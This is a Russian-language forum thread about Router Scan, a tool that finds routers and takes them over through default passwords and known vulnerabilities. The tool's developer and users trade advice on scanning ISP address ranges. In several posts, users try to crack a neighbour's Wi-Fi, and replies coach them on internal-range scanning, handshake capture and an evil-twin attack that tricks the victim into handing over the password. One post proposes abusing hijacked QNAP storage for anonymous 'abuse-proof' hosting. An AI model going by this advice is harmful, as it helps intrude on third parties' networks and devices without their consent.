PDA

Просмотр полной версии : прога Router Scan


Страницы : 1 2 3 [4] 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

binarymaster
15.07.2015, 05:21
Сегодня утром на гик-хабре прочитал захватывающую дух статью по нашей теме:

http://geektimes.ru/post/253392/

И задумался... интересно, есть ли роутеры, которые Router Scan по каким-то причинам вывел из строя. И если да, то сколько их. Проект предполагает использование неразрушающих уязвимостей, эксплуатация которых не должна приводить к падениям, отказам в обслуживании, и прочим малоприятным последствиям.

Сегодня же, во время тестового сканирования диапазонов МГТС, обнаружил, что многие роутеры ZTE F660 вместо веб-админки выдают 500 Internal Error, выводя неизвестную ошибку в одном из системных скриптов. В браузере это выглядит так:

http://s7.hostingkartinok.com/uploads/images/2015/07/b076daf34ec6c4b50ca08a6d01476cba.png

Решил попробовать зайти в telnet, и получилось - порт 23 был открыт, и пароль был одним из стандартных. Посмотрел структуру папок - в /home/httpd было пусто! Но этого не может быть, файловая система ведь только для чтения. Решил копнуть в сторону монтированных разделов, и наткнулся на такую вещь:


/ # mount
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw)
/dev/mtdblock2 on /tagparam type jffs2 (rw)
tmpfs on /var type tmpfs (rw)
/dev/mtdblock5 on /userconfig type jffs2 (rw)
none on /proc/bus/usb type usbfs (rw)
tmpfs on /home/httpd type tmpfs (rw)
Последняя строчка указывает, что смонтирована временная ФС в памяти устройства по адресу /home/httpd. И тут мне пришло в голову, что один из эксплойтов Router Scan для ZTE использует телнет и монтирование временного хранилища для подгрузки скрипта test_gch.gch, получающего пароль администратора.

Казалось бы, в коде данного эксплойта предусмотрено последующее размонтирование директории после получения пароля... но не всё так гладко. Router Scan имеет свойство зависать при одновременной обработке большого кол-ва устройств и иногда падать. А это означает, что эксплойт может остановиться на пол пути, не размонтировав директорию, таким образом вызвав отказ в обслуживании веб интерфейса.

После я решил узнать, сколько таких сломанных админок насчитывается в мире...

https://www.shodan.io/search?query=Mini+web+server+ZTE+corp+500+Error

А их чуть более полкило! (Showing results 1 - 10 of 519)

В общем, сей факт меня не радует, и я добавил в Router Scan код, позволяющий определить данную неисправность, и в автоматическом режиме (как всегда) исправить её через тот же telnet. Исправляется всё очень просто:

1. Получаем root шелл

2. umount /home/httpd

3. exit

После чего функционал веб интерфейса приходит в норму. Конечно, данный недочёт не является критическим, поскольку он также исправляется обычной перезагрузкой, но всё же мало приятным. Исправляющая фича будет доступна в релизе.

akokarev
15.07.2015, 15:49
Вопрос. Если изменили логин пароль на наностейшен м5, РоутерСкан до роутера пробьётся если на роутере дефолтный логин пароль?

Подробнее. Провайдер поставляет интернет по оборудованию <Ubiquiti>. логин пароль ubnt:ubnt изменил, я сканю свой диапазон ip,выдаёт кучу наностейшенов всяких без доступа, а как до роутеров достучатся?

Как узнать логин:пароль наностейшен.



Если точки настроены в режиме роутеров (т.е. включен NAT), то чтобы достучаться до оконечного оборудования, надо пробросить соответствующий порт на его внутренний ip. Если обе точки настроены в режиме роутера, то это надо проделать на обеих точках. Для сканрования следующего роутера во внутренней сети наностэйшна придется проделать все тоже самое. Короче это геморой еще тот!

Другое дело, если наностэйшны работают в режиме моста, тогда нужно просто сканировать соответсвующий диапазо IP, на котором сидят абоны, а не наностэйшны, и будет все ок.

atlas28
15.07.2015, 15:53
Сегодня утром на гик-хабре прочитал захватывающую дух статью по нашей теме:

http://geektimes.ru/post/253392/



Хы, моя статейка

binarymaster, может быть стоит добавить эту уязвимость в RouterScan? Это как минимум позволит узнать SSID и пароль от WiFi. Так же можно сделать так, чтобы RouterScan этот пароль попробовал и к web-интерфейсу, т. к. зачастую они совпадают, как мы видим.

binarymaster
15.07.2015, 16:30
Хы, моя статейка


Спасибо за интересную статью!



может быть стоит добавить эту уязвимость в RouterScan? Так же можно сделать так, чтобы RouterScan этот пароль попробовал и к web-интерфейсу, т. к. зачастую они совпадают, как мы видим.



И то, и другое - уже добавлено

atlas28
15.07.2015, 16:36
И то, и другое - уже добавлено


Круто, не знал) Просто в тот момент, когда я все это делал, еще не было, поэтому и написал) Жаль, что эту ветку форума раньше не увидел.

xrom672
15.07.2015, 17:30
Мой ip это ip наностейшен которая стоит у меня на крыше.

Ответ на свой вопрос я нашол. Я узнал IP товарища,попросил скинуть роутер на дефолтный это сканю,результат отрицательный,ёщё раз сканю,так-же его роутер я не вижу,-печаль.

Klaatu
15.07.2015, 19:04
Хы, моя статейка


LOL, а я чуть не написал гневный пост насчет рукожопства автора. Перепортить десяток-другой роутеров народу - это конечно высший пилотаж! Вместо того, чтобы купить этот копеечный б/у роутер и сделать все по уму. Тренироваться надо на кошках(с), иначе ваш финал может быть как в этом известном фильме

Ну и засылка к жертве эдакого беспалевного агента смита с просьбой открыть доступ к роутеру жертвы из wan, вместо прописи банального статического маршрута с хакнутого и перепрошитого в openwrt роутера на свой vpn-шлюз (asus в статье). Из статьи следует, что автор это понял, но слишком поздно. Кстати, совсем не обязательно добавлять этот маршрут в саму прошивку, все прекрасно делается уже после, ведь роутер под вашим контролем. В общем, эпик фейл, рука-лицо и минус к карме от двух десятков ни в чем не повинных юзеров.

atlas28
15.07.2015, 19:10
LOL, а я чуть не написал гневный пост насчет рукожопства автора. Перепортить десяток-другой роутеров народу - это конечно высший пилотаж! Вместо того, чтобы купить этот копеечный б/у роутер и сделать все по уму. Тренироваться надо на кошках(с), иначе ваш финал может быть как в этом известном фильме

Ну и засылка к жертве эдакого беспалевного агента смита с просьбой открыть доступ к роутеру жертвы из wan, вместо прописи банального статического маршрута с хакнутого и перепрошитого в openwrt роутера на свой vpn-шлюз (asus в статье). Из статьи следует, что автор это понял, но слишком поздно. Кстати, совсем не обязательно добавлять этот маршрут в саму прошивку, все прекрасно делается уже после, ведь роутер под вашим контролем. В общем, эпик фейл, рука-лицо и минус к карме от двух десятков ни в чем не повинных юзеров.



Да поздно все понял) Дело было срочное, на ходу все придумывал

VladimirV
15.07.2015, 19:22
Мой ip это ip наностейшен которая стоит у меня на крыше.

Ответ на свой вопрос я нашол. Я узнал IP товарища,попросил скинуть роутер на дефолтный <admin:admin> это <TP-LINK TL-WR841ND> сканю,результат отрицательный,ёщё раз сканю,так-же его роутер я не вижу,-печаль.



А чтоб товарищ разрешил доступ из wan попросили?

Ossen
15.07.2015, 19:43
Мой ip это ip наностейшен которая стоит у меня на крыше.

Ответ на свой вопрос я нашол. Я узнал IP товарища,попросил скинуть роутер на дефолтный <admin:admin> это <TP-LINK TL-WR841ND> сканю,результат отрицательный,ёщё раз сканю,так-же его роутер я не вижу,-печаль.



В настройках роутера во вкладке Безопасность "Удалённое управление" пусть выставит порт 80 и ip управления 255.255.255.255

akior
17.07.2015, 13:50
Возможна ли реализация CDP и LLDP ? конечно IP адрес мы знаем, но так можно взять Device ID, platform. Для заполнения пустых полей при сканировании.

Хотелось бы еще узнать, есть ли какие эксплойты на Микротик? Если нет, могу дать 1 микрот на растерзание, вдруг что найдется (так же возможно учесть доступ через winbox по порту 8291)

binarymaster
17.07.2015, 21:42
Я уже много раз писал, что Router Scan поддерживает сканирование только по протоколу HTTP. Фундамент данной архитектуры заложен уже давно, поддержка других протоколов возможна только через "костыли".

Payer
17.07.2015, 22:05
Пару вопросов:

1) В сохранениях в формате csv попадают лишние символы в строках

Boa ADSL (Rostelecom RT-A1W4L1USBn | Ralink-3162)

Там перенос строки (0d 0a) затесался на некоторых прошивках перед знаком |. Может уже поправили и я пропустил.

2) Бету уже скачали более 300 раз, Релиз кандидат не будете выкладывать? Тогда будем ждать релиза.

VladimirV
17.07.2015, 23:01
У меня тоже есть пожелание. Добавить сочетание клавиш для popup меню- 'Reset'.

binarymaster
18.07.2015, 00:46
В сохранениях в формате csv попадают лишние символы в строках

Boa ADSL (Rostelecom RT-A1W4L1USBn | Ralink-3162)

Там перенос строки (0d 0a) затесался на некоторых прошивках перед знаком |. Может уже поправили и я пропустил.



Вроде ещё не поправлял, теперь поправил.



У меня тоже есть пожелание. Добавить сочетание клавиш для popup меню- 'Reset'.



Сделал Alt+R.



Бету уже скачали более 300 раз, Релиз кандидат не будете выкладывать? Тогда будем ждать релиза.



Да, будет релиз.

polosatyj
18.07.2015, 02:28
Как за один раз прогнать этот список??? http://ipgeobase.ru/cgi-bin/AdvSear...E5%E4%E5%F0%E0%EB%FC%ED%FB%E9+%EE%EA%F0% F3%E3

akokarev
18.07.2015, 02:40
Как за один раз прогнать этот список??? http://ipgeobase.ru/cgi-bin/AdvSear...E5%E4%E5%F0%E0%EB%FC%ED%FB%E9+%EE%EA%F0% F3%E3



А в чем проблема? Нажимаешь кнопочку E и вставляешь весь список, запускаешь программу и долго-долго ждешь.

TARGAS
18.07.2015, 08:11
Как за один раз прогнать этот список??? http://ipgeobase.ru/cgi-bin/AdvSear...E5%E4%E5%F0%E0%EB%FC%ED%FB%E9+%EE%EA%F0% F3%E3



При копировании этого списка у тебя будет выделяться и статус и организация тоже, так вот, чтоб не копировать по отдельности каждый диапазон (а их там у тебя реально много) скопируй список в файл эксель, там он хорошо распределится по столбцам, и тогда одним махом удалишь ненужные столбцы, а диапазоны выделишь и копипастом вставишь в программу и вперед.

binarymaster
18.07.2015, 19:49
P.S. релиз версии 2.52 наконец-то состоялся

polosatyj
18.07.2015, 20:07
скопируй список в файл эксель, там он хорошо распределится по столбцам



Вот за это спасибо огромное!!! Сейчас на работе попробовал, всё так и получается. А то я уже всю голову сломал, как этот список переконвертировать в удобный формат.



а их там у тебя реально много



Почти 9 тысяч блоков. Но большинство из них-это 3-5 адресов. Так что другой вопрос: сколько диапазонов адресов за раз может переварить роутер скан?

VladimirV
19.07.2015, 00:22
Так что другой вопрос: сколько диапазонов адресов за раз может переварить роутер скан?



10000 проверил

http://rghost.ru/8JHfHYvfc/image.png

polosatyj
19.07.2015, 01:11
10000 проверил

проверил/QUOTE]

Солидно. Сколько времени заняло сканирование?

Sheez
19.07.2015, 01:18
10000 проверил

http://rghost.ru/8JHfHYvfc/image.png


10000 это не лимит, RouterScan продолжает работать, просто предупреждает что это надолго.

polosatyj
19.07.2015, 03:59
Что это за чудесная такая софтина на видео показана, Geoip? Там видно, как в выборе городов мелькает название моей глухомани (Сясьстрой), которого я не встречал ни в одной базе ip адресов. Может плохо ищу?

MiAl
19.07.2015, 09:46
Как за один раз прогнать этот список??? http://ipgeobase.ru/cgi-bin/AdvSear...E5%E4%E5%F0%E0%EB%FC%ED%FB%E9+%EE%EA%F0% F3%E3



Уже сделали? В Linux это можно было бы провернуть одной строкой:


curl -s 'http://ipgeobase.ru/cgi-bin/AdvSearch.cgi?company=PSTAR-MNT&choice=+%CF%EE%E8%F1%EA+&action_type=mntner_search&city=%D1%E0%ED%EA%F2-%CF%E5%F2%E5%F0%E1%F3%F0%E3&region=%D1%E0%ED%EA%F2-%CF%E5%F2%E5%F0%E1%F3%F0%E3&district=%D1%E5%E2%E5%F0%EE-%C7%E0%EF%E0%E4%ED%FB%E9+%F4%E5%E4%E5%F0%E0%EB%FC% ED%FB%E9+%EE%EA%F0%F3%E3' | grep -o -E '[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3} - [0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}' > diap_ip.txt
И всё бы сохранилось в файл diap_ip.txt

Если нет под рукой Linux, то вот я сделал для вас: webware.biz/uploadfiles/diap_ip.7z

Если ещё кому-то понадобиться отфильтровать диапазоны IP с сайта ipgeobase.ru, то можно сделать так:


curl -s 'URL' | grep -o -E '[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3} - [0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}' > diap_ip.txt
Где вместо 'URL' введите адрес страницы на ipgeobase.ru, которую нужно пропарсить.

Payer
19.07.2015, 10:51
Что это за чудесная такая софтина на видео показана, Geoip?



Можете не искать, там по вашему запросу 8 адресов только, что в программе, что на сайте http://ipdip.org/

Payer
19.07.2015, 11:01
P.S. релиз версии 2.52 наконец-то состоялся



Очень порадовал релиз под выходной, есть возможность попробовать в свободное время.

Первое замечание несущественное - в релизе гдето глубоко осталось упоминание про бету. В процессах и на поверхности нормально заголовок пишет, а в некоторых полях видать в исходнике осталась буковка b.

Второе замечание очень существенное для меня.

Самопроизвольно переключается на формирование отчета без гудов. Пишет типа "сильная загрузка процессора...." и переходит в режим не формирования гудов и дефолтными ставит сохраниение таблицы реалтайма.

Если это новая функция, тогда хотелось бы видеть три варианта настроек - Авто, Без гудов, С гудами.

А так оно работает в авто режиме и будет пугать сообщениями на рабочем чужом компьютере в понедельник

--------

Спасибо вам за работу и труд! Отличная вещь получилась.

zimmer
19.07.2015, 11:02
в последнее время попадается много точек netis в роутерскане определяется как Boa/0.94.14rc21, они открыты (во всяком случае из локалки даже не просит логина или пароля), binarymaster, добавь пожалуйся чтобы тоже в результатах отображал их... темболее доступ к ним свободный..

ip 92.55.179.183 порт 80 и 8080...

polosatyj
19.07.2015, 11:25
Можете не искать, там по вашему запросу 8 адресов только, что в программе, что на сайте http://ipdip.org/



Ясно. Значит всё таки придётся сканировать весь диапазон адресов Питера и области ради соседского пароля.



Если нет под рукой Linux, то вот я сделал для вас



Спасибо за помощь и за полезную информацию!

Triton_Mgn
19.07.2015, 15:36
Плохо, что нет RouterScan под Linux, корявый wine падает, а может и сам RouterScan при объемном сканировании 6000 и упал, приходится лезть в окна и там сканить, Т.к неудобно сканировать по мелким диапазонам, а потом все собирать в кучу. Под Windoй 7 не падает.

Вот еще ресурс диапазонов ip от 14 декабря 2014г

http://ip.posle.info

binarymaster
19.07.2015, 16:58
Если это новая функция, тогда хотелось бы видеть три варианта настроек - Авто, Без гудов, С гудами.



Ммм... прошу поробнее описать, в каком случае какое поведение должно быть.



ip 92.55.179.183 порт 80 и 8080...



Уже оффлайн... ну ничего, может найду.

CRACK211
19.07.2015, 16:58
Вопрос к мастеру. можно ли добавить в прграмму базы или программы по ip диапазонам наподобие IpGeoBase , ip_city,Geoip или прикруть это http://ip.posle.info/ ресурс для определения диапазонов своего провайдера и не только своего по ip?

polosatyj
19.07.2015, 17:08
Где найти диапазоны местного интернет провайдера? http://www.syastv.ru/

akokarev
19.07.2015, 17:48
Где найти диапазоны местного интернет провайдера? http://www.syastv.ru/



Маленький провайдер, использует аплинком Ростелеком. Скорее всего у них маленький диапазон внешних ip, например тот, где находится сайт 95.167.190.0-95.167.190.255 выданный Ростелекомом, а абоны сидят за NAT'ом. А может и того меньше (на 95.167.190.170 сидит АДСЛ модем).

Как вариант - позвонить\написать провайдеру и попросить дать диапазон внутренних\внешних ip для настройки маршрутизации на роутере в локальную сеть провайдера.

MiAl
19.07.2015, 17:50
Где найти диапазоны местного интернет провайдера? http://www.syastv.ru/



Сайт syastv.ru на IP 95.167.190.230.

На IP 95.167.190.236 сайт компании с адресом г. Сясьстрой, ул. Петрозаводская, д.35а (4 этаж) тел. +7 953 364 13 37.

http://ipgeobase.ru/ для 95.167.190.230 выдаёт следующий блок адресов: 95.167.189.148 - 95.167.191.47. Он, думаю, примерно и соответствует этому провайдеру, хотя можно ещё и в соседних подсетях посмотреть.

Хотя http://95.167.191.241/ - это уже город Тихвин

А http://95.167.191.195/ - это уже г. Череповец, Вологодской обл.

Triton_Mgn
19.07.2015, 18:08
Маленький провайдер, использует аплинком Ростелеком. Скорее всего у них маленький диапазон внешних ip, например тот, где находится сайт 95.167.190.0-95.167.190.255 выданный Ростелекомом, а абоны сидят за NAT'ом. А может и того меньше (на 95.167.190.170 сидит АДСЛ модем).

Как вариант - позвонить\написать провайдеру и попросить дать диапазон внутренних\внешних ip для настройки маршрутизации на роутере в локальную сеть провайдера.



скорее Вы не получите маленький диазон, по крайней мере посмотрите в эту тему http://forum.antichat.ru/threads/427913/

Payer
19.07.2015, 19:22
Ммм... прошу поробнее описать, в каком случае какое поведение должно быть.



Так уже все три варианта опробованы.

В версии 2,51 можно было включить или отключить формирование результатов. Программа слушалась настроек беспрекословно.

На настольном ПК всегда была включена, на ноутбуке отключена и ему легче было сканировать не отвлекаясь на вывод таблицы.

В версии 2,52 при нагрузке на процессор формирование таблицы отключается. Хотелось бы управлять этим процессом.

Если нужно такое автоматическое поведение - включаем, если нет - выбираем формировать или нет.

Обидно, когда на середине сканирования на восьмиядерном проце выводится сообщение и портачится таблица.

Причем это же событие происходит, когда пытаемся эту же таблицу импортировать в программу. В середине процесса импорта выводится сообщение о загрузке процессора и самопроизвольно отключается формирование таблицы годных данных.

Вот как то так....

gentux
20.07.2015, 16:11
@binarymaster (https://forum.antichat.xyz/members/148032/)

http://habrahabr.ru/post/263089/

Занимательная статья.

henri2002
21.07.2015, 21:28
Address: http://93.170.123.18/Time: 47 ms

Authorization: admin:Ferum

Device: My Realm

когда захожу с браузера.

error: access denied

binarymaster
22.07.2015, 01:47
Аналогично. Значит мы не узнаем, что там на самом деле

NisyBoy
22.07.2015, 17:56
Аналогично. Значит мы не узнаем, что там на самом деле



Здравствуйте. Просканировал местные ip Ростелекома, точки соседа так и не нашел, но такое чувство что скрывается она под вот этими http://s017.radikal.ru/i422/1507/21/ffd4467ab238t.jpg . Можно сделать что-то с ними? Не отображаются никакие данные.

binarymaster
22.07.2015, 18:04
точки соседа так и не нашел, но такое чувство что скрывается она под вот этими



означает, что в роутере нет беспроводного модуля, и он не может быть точкой доступа.

Какой мак-адрес и имя у вашей искомой сети?

NisyBoy
22.07.2015, 18:18
<no wireless> означает, что в роутере нет беспроводного модуля, и он не может быть точкой доступа.

Какой мак-адрес и имя у вашей искомой сети?



О_о МАС: A6:64:C7:66:9C:E0 ИМЯ: ZXDSL931WII. Человек вылаживал в другой теме RouterScanLog и там под ZYNOS и подобными почему-то соответствовала точка ZXDSL931WII. Хотя там это совершенно разные модели роутеров.

binarymaster
22.07.2015, 19:57
МАС: A6:64:C7:66:9C:E0 ИМЯ: ZXDSL931WII



Посмотрел базу 3WiFi, в ней этой точки пока нет, но есть похожие.

Могу дать четыре совета по этому поводу:

1. Попробуйте просканировать локальные сети ваших провайдеров, у многих провайдеров есть внутренняя городская сеть

2. Результаты сканирования можно добавлять в базу 3WiFi (а внутренних диапазонов - желательно, ибо к ним может быть доступ только у вас)

3. Router Scan позволяет получать местоположение некоторых найденных точек, эту возможность можно использовать для проверки - нужный ли диапазон сканируется или нет (точки должны быть хотя бы в одном районе с вами)

4. Перехватите хендшейк между точкой и клиентом, в соседней теме помогают с их подбором

NisyBoy
22.07.2015, 20:06
Посмотрел базу 3WiFi, в ней этой точки пока нет, но есть похожие.

Могу дать четыре совета по этому поводу:

1. Попробуйте просканировать локальные сети ваших провайдеров, у многих провайдеров есть внутренняя городская сеть

2. Результаты сканирования можно добавлять в базу 3WiFi (а внутренних диапазонов - желательно, ибо к ним может быть доступ только у вас)

3. Router Scan позволяет получать местоположение некоторых найденных точек, эту возможность можно использовать для проверки - нужный ли диапазон сканируется или нет (точки должны быть хотя бы в одном районе с вами)

4. Перехватите хендшейк между точкой и клиентом, в соседней теме помогают с их подбором



1.Хендшейк уже перехватывал, гонял по словарям, по мобильным телефонам, датам и тд. Никаких результатов. Смотря на те пароли которые выдает routerscan становится понятно, что не подберу я пароль брутом(.

2.Как мне просканировать внутренние сети Ростелекома? Где взять диапазон ip? Живу я Курская область->Коренево. Знаю точно что у соседа ростелеком (раньше точка была не запоролена)

3. Пробывал получить местоположение некоторых точек, толи это баг, но местонахождения разных точек показывает в одном месте. В Курске за 150км от меня.

Спасибо за помощь. И еще количество потоков влияет на качество сканирования? У меня 3g модем.

polosatyj
22.07.2015, 20:26
1. Попробуйте просканировать локальные сети ваших провайдеров, у многих провайдеров есть внутренняя городская сеть



Как узнать этот диапазон?

binarymaster
22.07.2015, 20:35
Как узнать этот диапазон?



Методом проб и ошибок, а также поможет трассировка (можно увидеть промежуточные узлы и сети).

Подробнее о внутренних диапазонах я ещё писал здесь.

NisyBoy
22.07.2015, 21:00
Методом проб и ошибок, а также поможет трассировка (можно увидеть промежуточные узлы и сети).

Подробнее о внутренних диапазонах я ещё писал здесь.



Провел трассировку до 10.0.0.1 http://http://s020.radikal.ru/i723/1507/06/01c2bbbdcfd3t.jpg (http://radikal.ru/fp/6e674a2c7f2c451eac3c166349cac4d4) http://s020.radikal.ru/i723/1507/06/01c2bbbdcfd3t.jpg О чем то говорит?

polosatyj
22.07.2015, 21:07
а также поможет трассировка



Трассер куда? 10.0.0.1 не отвечает. Какие ещё могут быть варианты?

binarymaster
22.07.2015, 21:20
Провел трассировку до 10.0.0.1 О чем то говорит?



10.52.0.0/16

10.152.0.0/16

Очевидно же по скриншоту

NisyBoy
22.07.2015, 21:42
10.52.0.0/16

10.152.0.0/16

Очевидно же по скриншоту



Я нуб в этом деле) спс за инфу.

NisyBoy
22.07.2015, 23:38
10.52.0.0/16

10.152.0.0/16

Очевидно же по скриншоту



Проверил, увы ничего. Попробую еще раз просканить все ip Ростелекома. Что можно сделать еще?

binarymaster
23.07.2015, 01:26
Проверил, увы ничего. Попробую еще раз просканить все ip Ростелекома. Что можно сделать еще?



Добавьте в список портов ещё 443 и 8443 на всякий случай.

NisyBoy
23.07.2015, 10:37
Добавьте в список портов ещё 443 и 8443 на всякий случай.



Добавил, проверил снова все блоки ip Ростелекома. Нет результатов. Не ломану короче я уже точку. Прийдется сидеть с гребанного 3g модема(

NisyBoy
23.07.2015, 23:10
Добавьте в список портов ещё 443 и 8443 на всякий случай.



Я вижу вы человек прошареный. Так вот вопрос. На хабре наткнулся на тему по поводу атаки на WPA TKIP(такая у соседа) http://habrahabr.ru/post/50454/. Так же наткнулся на темы про DOS атаки на Хоста (man-in-middle). Я так понял мы подменяем хоста своей (призрачной) точкой и сосед подключается к своей(якобы) точке ( вводит при этом свой пароль) или я не правильно понял? Что думаете по этому поводу? Стоит лопатить материал? Или ничего не выйдет?

RomanxD
24.07.2015, 00:12
Я вижу вы человек прошареный. Так вот вопрос. На хабре наткнулся на тему по поводу атаки на WPA TKIP(такая у соседа) http://habrahabr.ru/post/50454/. Так же наткнулся на темы про DOS атаки на Хоста (man-in-middle). Я так понял мы подменяем хоста своей (призрачной) точкой и сосед подключается к своей(якобы) точке ( вводит при этом свой пароль) или я не правильно понял? Что думаете по этому поводу? Стоит лопатить материал? Или ничего не выйдет?



В WifiSlax для этого есть скрипт LINSET.

NisyBoy
24.07.2015, 00:22
В WifiSlax для этого есть скрипт LINSET.


Мде. Без бутылки не сообразишь)

NisyBoy
24.07.2015, 01:04
В WifiSlax для этого есть скрипт LINSET.


Она создает точку с защитой WPA? В темах пишут, что точку с защитой не создает ( если и создает, то устройства не хотят подключатся). На видео человек Создает Фэйк точку и DDOSит роутер соседа?

akokarev
24.07.2015, 04:11
http://91.210.151.17:8080/ admin:admin routerscan не смог подобрать. Некий QNAP (https://www.myqnapcloud.com/?lang=ru)

RomanxD
24.07.2015, 05:02
В темах пишут, что точку с защитой не создает ( если и создает, то устройства не хотят подключатся).



Не создаёт защиту, её и не надо. Для атаки нужно быть ближе к роутеру и клиенту.

binarymaster
24.07.2015, 05:13
http://91.210.151.17:8080/ admin:admin routerscan не смог подобрать. Некий QNAP (https://www.myqnapcloud.com/?lang=ru)



Это файловое хранилище, уже много раз видел такие



Не создаёт защиту, её и не надо. Для атаки нужно быть ближе к роутеру и клиенту.



Именно, атака состоит в том, чтобы жертва подключилась к нашей незащищённой сети (с таким же именем), и отдала добровольно пароль от точки.

akokarev
24.07.2015, 06:29
Это файловое хранилище, уже много раз видел такие


Очень вкусная штука! Можно замутить распределенный хостинг по таким девайсам с автоматической синхронизацией =) И тады сайт фиг положешь... + Анонимно, бесплатно, абузно

yurasena
24.07.2015, 12:08
Подскажите, где можно выдернуть диапазон IP провайдера DOM.ru (Питер) ?

NisyBoy
24.07.2015, 14:05
Это файловое хранилище, уже много раз видел такие

Именно, атака состоит в том, чтобы жертва подключилась к нашей незащищённой сети (с таким же именем), и отдала добровольно пароль от точки.



Ну если так, то попробуем) А то я уж решил сдаться)

binarymaster
24.07.2015, 15:48
Подскажите, где можно выдернуть диапазон IP провайдера DOM.ru (Питер) ?



https://forum.antichat.ru/threads/427913/

binarymaster
25.07.2015, 17:12
можно ли добавить сартировку по алфавиту например при нажатие на шапку столбца результата по завершению скана?

просто так удобнее будет сохранить результаты - которые не попали во вкладку гуд....



Уже реализовано для вкладки поиска. Для других вкладок - технически сложно выполнимо.

Mayor16
25.07.2015, 21:18
технически сложно выполнимо



Переходите на .Net

binarymaster
25.07.2015, 21:41
Переходите на .Net


Nope.

Sheez
25.07.2015, 22:34
Переходите на .Net


Напиши свой РоутерСкан на .Net , а мы сравним

CRACK211
26.07.2015, 15:33
Подскажите пожалуйста чем можно быстро сканироваться большие диапазоны а потом добавить в роутерскат IP с открытыми портами? и какие еще можно указать порты в роутерскане кроме 23, 80, 1080, 443,8443?

atlas28
26.07.2015, 17:27
Подскажите пожалуйста чем можно быстро сканироваться большие диапазоны а потом добавить в роутерскат IP с открытыми портами?



Angry IP Scanner

zimmer
28.07.2015, 05:51
какие еще можно указать порты в роутерскане кроме 23, 80, 1080, 443,8443?



8080 - на многих роутерах это порт для доступа из внешки ну и также 8081, 3128, 1081,8085, 8888, 808, 85, 81 - впринципе хоть весь диапозон айпишников, только надо учитывать что чем больше портов - тем дольше процесс скана...

Hunter2015
28.07.2015, 18:16
8080 - на многих роутерах это порт для доступа из внешки ну и также 8081, 3128, 1081,8085, 8888, 808, 85, 81 - впринципе хоть весь диапозон айпишников, только надо учитывать что чем больше портов - тем дольше процесс скана...



Это Вы стандартные порты такие встречали на роутерах?

Если ставят не стандартные, то 5ти знак, а там вариаций.... если б понять как-то что удаленка открыта, тогда может есть смысл и 5ти знак перебрать.

edwar1
29.07.2015, 20:50
Программа перестала видеть многие точки! У меня вопрос такого плана, подключился к точке на 2ip.ru посмотрел какой ip, попробовал зайти по нему через браузер, всё хорошо заходит в веб, переподключился к другой точке пробую зайти на первую по известному мне ip, не заходит(ip не изменился проверял) в чем причина?

4pips
29.07.2015, 23:23
Программа перестала видеть многие точки! У меня вопрос такого плана, подключился к точке на 2ip.ru посмотрел какой ip, попробовал зайти по нему через браузер, всё хорошо заходит в веб, переподключился к другой точке пробую зайти на первую по известному мне ip, не заходит(ip не изменился проверял) в чем причина?



Ситуация странная ...

Один из маловероятных, но возможных вариантов, это очень короткое время аренды внешнего адреса.

Когда через браузер смотрел, аренда еще действовала, пока переключался - закончилась и нет теперь никого по этому адресу.

Ossen
29.07.2015, 23:26
Да есть такое к примеру наблюдаю у D Link 615 до сканирования захожу в веб интерфейс роутера нормально после сканирования при попытке зайти в веб интерфейс выдаёт ошибку 404 на розовом фоне. Что то похожее наблюдается у азусов первый раз пускает в вебморду а во второй раз нет.

resident148
29.07.2015, 23:37
Программа перестала видеть многие точки!



Не спешите с выводами, а лучше - примеры в студию



У меня вопрос такого плана, подключился к точке на 2ip.ru посмотрел какой ip, попробовал зайти по нему через браузер, всё хорошо заходит в веб, переподключился к другой точке пробую зайти на первую по известному мне ip, не заходит(ip не изменился проверял) в чем причина?



Когда пользователь пытается зайти на свой внешний IP адрес, назначенный ему провайдером из домашней сети (домашней в прямом смысле), то пакет не делает крюк уходя в инет и возвращаясь на роутер и затем обратно - для роутера (знающего свой внешний IP) этот доступ считается пришедшим из LAN (домашней сети)(доверенной зоны) и не покидает пределы этой самой сети. Часто точка блокирует доступ из WAN (из сети). Почему? Не на всех точках по умолчанию открыт доступ из сети - на многих его нужно включать и сделано это специально производителем и иногда провайдером.

edwar1
30.07.2015, 02:33
Не спешите с выводами, а лучше - примеры в студию

Когда пользователь пытается зайти на свой внешний IP адрес, назначенный ему провайдером из домашней сети (домашней в прямом смысле), то пакет не делает крюк уходя в инет и возвращаясь на роутер и затем обратно - для роутера (знающего свой внешний IP) этот доступ считается пришедшим из LAN (домашней сети)(доверенной зоны) и не покидает пределы этой самой сети. Часто точка блокирует доступ из WAN (из сети). Почему? Не на всех точках по умолчанию открыт доступ из сети - на многих его нужно включать и сделано это специально производителем и иногда провайдером.



А может это провайдер как-то блокировать? Опробовал все доступные мне точки везде так, других провайдеров проверить не могу, т.к. в нашем районе только Ростелеком других нет!

resident148
30.07.2015, 13:15
А может это провайдер как-то блокировать? Опробовал все доступные мне точки везде так, других провайдеров проверить не могу, т.к. в нашем районе только Ростелеком других нет!



Если на точках включено удаленное администрирование, но доступа из вне так и нет, то это точно провайдер - он мОжет блокировать порты доступа (80, 8080 используемые по умолчанию).

Datak1ng
30.07.2015, 15:36
Всем привет, как узнать ip роутеров в моей сети ? чтобы потом забить в router scan ? Спасибо

http://i.imgur.com/1jJGKEJ.jpg?1

TOX1C
30.07.2015, 18:58
правой кнопкой по роутеру - свойства)))

http://i69.fastpic.ru/big/2015/0730/e0/b34132f806602b866325a6fb323d3ee0.png

binarymaster
30.07.2015, 19:05
Всем привет, как узнать ip роутеров в моей сети ? чтобы потом забить в router scan ? Спасибо


Нижний правый - это ваш роутер, посмотреть IP можно через свойства. Остальные обнаружились по протоколу WCN (очевидно, на них включён WPS), их IP-адреса получить не удастся.

Datak1ng
31.07.2015, 07:27
Нижний правый - это ваш роутер, посмотреть IP можно через свойства. Остальные обнаружились по протоколу WCN (очевидно, на них включён WPS), их IP-адреса получить не удастся.



Спасибо,жаль что еще не нашлось метода проникновения через протокол WCN, но чисто теоретически получается я могу через router scan найти эти роутеры через внутреннюю сеть (а не внешнюю), если поставлю на скан диапазон 10.0.0.0/8 ?

binarymaster
31.07.2015, 16:36
Теоретически. Диапазоны внутренней сети могут быть разные, для получения большей информации можно использовать трассировку (где-то выше я писал об этом).

